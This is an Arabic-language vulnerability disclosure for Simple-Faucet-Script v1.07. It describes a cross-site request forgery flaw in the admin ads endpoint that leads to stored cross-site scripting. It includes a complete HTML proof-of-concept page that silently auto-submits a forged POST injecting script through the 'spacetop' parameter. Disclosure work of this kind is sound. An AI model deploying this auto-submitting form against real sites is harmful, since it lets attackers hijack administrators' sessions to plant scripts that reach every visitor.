
ثغرة أمنية من نوع تزوير الطلب عبر المواقع (CSRF) في Salmen2/Simple-Faucet-Script v1.07 عبر طلب POST مُعدّ خصيصاً إلى admin.php?p=ads&c=1 مما يسمح للمهاجمين بتنفيذ كود عشوائي.
ثغرة أمنية من نوع تزوير الطلب عبر المواقع (CSRF) في Salmen2/Simple-Faucet-Script الإصدار 1.07 عبر طلب POST مٌصمم إلى admin.php?p=ads&c=1، مما يسمح للمهاجمين بتنفيذ كود تعسفي.
CWE-352: تزوير الطلب عبر المواقع (CSRF)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
المنتج عرضة لهجوم تزوير الطلب عبر المواقع (CSRF) على لوحة الإدارة. عندما يزور مسؤول موثوق صفحة ضارة تحتوي على كود الإثبات (PoC)، يتسبب هجوم CSRF في تعديل غير مصرح به لمحتوى الصفحة الرئيسية.
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h3>Standard CSRF PoC</h3>
<form action="https://example.com/admin.php?p=ads&c=1" method="post">
<input type="hidden" name="spacetop" value="<script>alert();</script>" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
يمكن للمهاجم حقن HTML/JavaScript تعسفي في الصفحة الرئيسية عبر المعامل spacetop، مما يؤدي إلى ثغرة تخزينية للبرمجة النصية عبر المواقع (Stored XSS).
منتظر محمد أحمد (almuntadhar0x01)